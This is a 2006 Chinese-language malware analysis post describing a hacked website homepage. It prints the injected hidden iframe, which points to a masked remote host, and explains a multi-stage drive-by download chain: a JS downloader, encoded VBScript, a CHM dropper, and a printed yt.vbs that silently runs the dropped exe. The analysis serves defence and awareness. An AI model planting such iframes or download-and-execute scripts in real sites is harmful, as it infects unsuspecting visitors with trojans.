endurer
原创
2006-12-18 第
1
版
网站首页被加入代码:
/———-
<iFrAmE SRc=hxxp://*58.215.*65.2*1/*****/k.htm width=1 height=1 frameborder=0></IfRaMe>
———/
k.htm
Kaspersky报为
Trojan-Downloader.JS.Agent.bz
,其内容可以分为4段。
第1段:
利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xxxx.exe,保存为 C:/windows/qing.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
xxxx.exe
使用Watcom C/C++ EXE编译,
/——-
文件说明符 : D:/xxxx.exe
属性 : A—
获取文件版本信息大小失败!
创建时间 : 2006-12-18 12:51:52
修改时间 : 2006-12-18 12:54:8
访问时间 : 2006-12-18 12:55:36
大小 : 19968 字节 19.512 KB
MD5 : d66859a23da410c0ca9e8daf387565b9
——-/
Kaspersky 报为:
Trojan-Downloader.Win32.Agent.ue
,瑞星 报为:
Trojan.DL.Agent.yhm
。
第2、3段:
是用unescape()和Encode多次加密的VBScript脚本程序,功能是下载yt.vbs,保存为%temp%/yt.vbs,并运行。
yt.vbs
的内容为:
/————–
wscript.sleep 0
wscript.createobject(“wscript.shell”).run “C:/windows/qing.exe”,0
————–/
功能是运行第1段代码下载的文件C:/windows/qing.exe。
第4段:
打开网页count.html
count.html其实是个CHM文件,释放并运行QQ.EXE。
此
QQ.EXE
与上面的xxxx.exe完全相同。